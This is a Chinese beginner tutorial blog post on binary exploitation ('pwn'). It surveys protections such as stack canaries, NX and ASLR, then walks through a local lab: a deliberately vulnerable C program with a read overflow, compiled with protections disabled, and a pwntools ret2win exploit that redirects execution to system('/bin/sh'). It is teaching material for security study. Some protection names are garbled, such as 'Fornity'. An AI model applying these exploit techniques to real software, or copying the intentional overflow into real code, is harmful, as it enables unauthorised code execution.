<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="对程序的保护进行简单的了解，不同的保护实现了什么保护，其具体的功能是什么，我们又该如何绕过">
<meta property="og:type" content="article">
<meta property="og:title" content="从0开始学Pwn-2.保护概述和溢出实例">
<meta property="og:url" content="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2.%E4%BF%9D%E6%8A%A4%E5%92%8C%E6%BA%A2%E5%87%BA/index.html">
<meta property="og:site_name" content="Csc8&#39;s">
<meta property="og:description" content="对程序的保护进行简单的了解，不同的保护实现了什么保护，其具体的功能是什么，我们又该如何绕过">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/jPuTVmQksM5tRAE.png">
<meta property="og:image" content="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/1ImyhnZbVRNkipD.png">
<meta property="og:image" content="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/toY9PmQfyJaO5ZE.png">
<meta property="article:published_time" content="2022-06-21T07:24:40.305Z">
<meta property="article:modified_time" content="2022-06-21T08:21:32.367Z">
<meta property="article:author" content="csc8">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/jPuTVmQksM5tRAE.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2022/06/21/从0开始学Pwn-2.保护和溢出/"/>





  <title>从0开始学Pwn-2.保护概述和溢出实例 | Csc8's</title>
  








<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>
<meta name="generator" content="Hexo 6.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Csc8's</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">苍松翠柏</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2.%E4%BF%9D%E6%8A%A4%E5%92%8C%E6%BA%A2%E5%87%BA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/%5Bobject%20Object%5D">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Csc8's">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">从0开始学Pwn-2.保护概述和溢出实例</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2022-06-21T15:24:40+08:00">
                2022-6-21
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>对程序的保护进行简单的了解，不同的保护实现了什么保护，其具体的功能是什么，我们又该如何绕过</p>
<span id="more"></span>



<h3 id="保护概述"><a href="#保护概述" class="headerlink" title="保护概述"></a>保护概述</h3><p>保护是操作系统提供的，目的是为了降低或阻止缓冲区溢出攻击</p>
<p>windows中提供了Dep(Linux下，Nx)， Aslr(Linux下，Pie)</p>
<h4 id="常见保护类型"><a href="#常见保护类型" class="headerlink" title="常见保护类型"></a>常见保护类型</h4><h5 id="①Canary-栈保护"><a href="#①Canary-栈保护" class="headerlink" title="①Canary(栈保护)"></a>①Canary(栈保护)</h5><p>linux下，cookie信息被称为canary</p>
<p>正常的缓冲区溢出攻击，是当函数存在漏洞时，攻击者可以覆盖栈上的返回地址，使得shellcode执行</p>
<p>Canary保护下，函数开始调用时，会往其栈里插入cookie信息；当函数返回时，会验证cookie信息是否合法，而攻击者在覆盖栈时，往往会覆盖掉其上的cookie信息</p>
<h5 id="③NX-DEP"><a href="#③NX-DEP" class="headerlink" title="③NX(DEP)"></a>③NX(DEP)</h5><p>即No-Execute(不可执行)，其会将数据所在的内存页标识为不可执行，程序溢出成功转入shellcode执行时，会尝试在数据页面执行指令，此时，CPU会抛出异常，拒绝执行恶意指令</p>
<h5 id="④PIE-ASLR"><a href="#④PIE-ASLR" class="headerlink" title="④PIE(ASLR)"></a>④PIE(ASLR)</h5><p>地址空间分布随机化，存在三种情况</p>
<p>0.表示关闭进程地址空间随机化</p>
<p>1.表示将mmap的基址，stack和vdso页面随机化</p>
<p>2.在1的基础上增加栈的随机化</p>
<p>一般结合NX使用，可以防止基于Ret2libc方式针对NX发起的攻击</p>
<h5 id="②Fornity"><a href="#②Fornity" class="headerlink" title="②Fornity"></a>②Fornity</h5><p>gcc编译器赋予的一种新的保护机制</p>
<p>在编译时生成一些数组替换危险函数如：strcpy, memcpy, memset</p>
<h5 id="⑤RWX"><a href="#⑤RWX" class="headerlink" title="⑤RWX"></a>⑤RWX</h5><p>设置符号重定向表格为只读or程序启动时解析并绑定所有动态符号，以减少对GOT攻击</p>
<h4 id="命令"><a href="#命令" class="headerlink" title="命令"></a>命令</h4><p>在root权限下，针对一个程序的检查</p>
<p><strong>检查保护情况</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">checksec 文件名</span><br></pre></td></tr></table></figure>

<p><strong>关闭栈保护</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -no-pie -fno-stack-protector -z execstack -m32 -o 2 2.c</span><br></pre></td></tr></table></figure>

<p><strong>查看程序的函数详情</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">objdump -t -j name</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">eg: objdump -t -j .text <span class="built_in">read</span></span></span><br></pre></td></tr></table></figure>

<p>-t:显示文件符号表入口</p>
<p>-j name :仅显示指定名称的section信息</p>
<h3 id="溢出实例"><a href="#溢出实例" class="headerlink" title="溢出实例"></a>溢出实例</h3><p>c：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">exploit</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    system(<span class="string">&quot;/bin/sh&quot;</span>);  <span class="comment">//获取shell权限</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> <span class="title function_">func</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> str[<span class="number">0x20</span>];</span><br><span class="line">    read(<span class="number">0</span>, str, <span class="number">0x50</span>); <span class="comment">//存在缓冲区溢出</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    func();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//通过exp实现exploit函数</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//函数解析：</span></span><br><span class="line"><span class="comment">//system(&quot;/bin/sh&quot;)</span></span><br><span class="line"><span class="comment">//read函数</span></span><br></pre></td></tr></table></figure>

<h4 id="c语言知识："><a href="#c语言知识：" class="headerlink" title="c语言知识："></a>c语言知识：</h4><p><strong>system(“&#x2F;bin&#x2F;sh”)</strong></p>
<p>执行该函数，可以获得shell权限</p>
<p><strong>read函数</strong></p>
<p>ssize_t read(int fd, void * buf, size_t count);</p>
<p>read()会把参数fd 所指的文件传送count 个字节到buf 指针所指的内存中. </p>
<p>buf: 读取缓冲区</p>
<p>若参数count 为0, 则read()不会有作用并返回0. 返回值为实际读取到的字节数, 如果返回0, 表示已到达文件尾或是无可读取的数据,此外文件读写位置会随读取到的字节移动.</p>
<h4 id="前期流程："><a href="#前期流程：" class="headerlink" title="前期流程："></a><strong>前期流程：</strong></h4><p><strong>编译(不开栈保护的32位程序)</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -no-pie -fno-stack-protector -z execstack -m32 -o 2 2.c</span><br></pre></td></tr></table></figure>

<p><strong>文件提权</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 2 </span><br></pre></td></tr></table></figure>

<p><strong>查询保护情况</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">checksec 2</span><br></pre></td></tr></table></figure>

<p><img src="/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/jPuTVmQksM5tRAE.png" alt="pwn5.PNG"></p>
<p><strong>检查函数详情</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">objdump -t -j .text 2 </span><br></pre></td></tr></table></figure>

<p>以后复杂程序，使用ida查看函数，F5反汇编</p>
<p><strong>反汇编</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb 2</span><br><span class="line">disass func</span><br><span class="line">b *0x08048457</span><br></pre></td></tr></table></figure>

<p><img src="/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/1ImyhnZbVRNkipD.png" alt="pwn6.PNG"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sub esp,<span class="number">0x28</span></span><br><span class="line"></span><br><span class="line">sub esp,<span class="number">0x4</span></span><br><span class="line"></span><br><span class="line">按道理应该分配<span class="number">28</span>字节,却分配了<span class="number">32</span>个字节,原因是为了保证读写速度,因为如果内存地址是<span class="number">16</span>的倍数(即十六进制表示末位为<span class="number">0</span>)读写会更快</span><br></pre></td></tr></table></figure>



<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">lea eax,[ebp<span class="number">-0x28</span>]  </span><br><span class="line"></span><br><span class="line">取地址指令</span><br><span class="line">将ds:ebp<span class="number">-0x28</span>对应的数据赋给eax</span><br></pre></td></tr></table></figure>



<h4 id="Exp-py编写"><a href="#Exp-py编写" class="headerlink" title="Exp.py编写"></a><strong>Exp.py编写</strong></h4><p><img src="/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-2/imgs/$%7Bfiilename%7D/toY9PmQfyJaO5ZE.png" alt="pwn8.PNG"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#导入pwntools库</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#创建一个进程，返回句柄</span></span><br><span class="line">p=process(<span class="string">&quot;./2&quot;</span>)   <span class="comment">#指定同一路径下程序</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#位移偏移量，覆盖栈帧空间+EBP</span></span><br><span class="line">offset= <span class="number">0x28</span> + <span class="number">0x4</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#用&#x27;a&#x27;字符覆盖完0x28和EBP，查明exploit地址，用p32()覆盖RET</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*offset +p32(<span class="number">0x0804843b</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#发送</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#获取运行时环境</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>chmod 777 exp.py</p>
<p>python exp.py</p>
<p>然后就可以拿shell，为所欲为了</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/06/21/%E4%BB%8E0%E5%BC%80%E5%A7%8B%E5%AD%A6Pwn-1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="next" title="从0开始学Pwn-1.基础知识">
                <i class="fa fa-chevron-left"></i> 从0开始学Pwn-1.基础知识
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/%5Bobject%20Object%5D"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%E6%A6%82%E8%BF%B0"><span class="nav-text">保护概述</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E4%BF%9D%E6%8A%A4%E7%B1%BB%E5%9E%8B"><span class="nav-text">常见保护类型</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E2%91%A0Canary-%E6%A0%88%E4%BF%9D%E6%8A%A4"><span class="nav-text">①Canary(栈保护)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E2%91%A2NX-DEP"><span class="nav-text">③NX(DEP)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E2%91%A3PIE-ASLR"><span class="nav-text">④PIE(ASLR)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E2%91%A1Fornity"><span class="nav-text">②Fornity</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E2%91%A4RWX"><span class="nav-text">⑤RWX</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4"><span class="nav-text">命令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%A2%E5%87%BA%E5%AE%9E%E4%BE%8B"><span class="nav-text">溢出实例</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#c%E8%AF%AD%E8%A8%80%E7%9F%A5%E8%AF%86%EF%BC%9A"><span class="nav-text">c语言知识：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E6%9C%9F%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="nav-text">前期流程：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Exp-py%E7%BC%96%E5%86%99"><span class="nav-text">Exp.py编写</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">csc8</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共字</span>
  <span class="post-meta-divider">|</span>
  本站总访问量<span id="busuanzi_value_site_pv"></span>次
  <span class="post-meta-divider">|</span>
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
  <span class="post-meta-divider">|</span>
  本文总阅读量<span id="busuanzi_value_page_pv"></span>次
</div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共字</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>
</body>
</html>
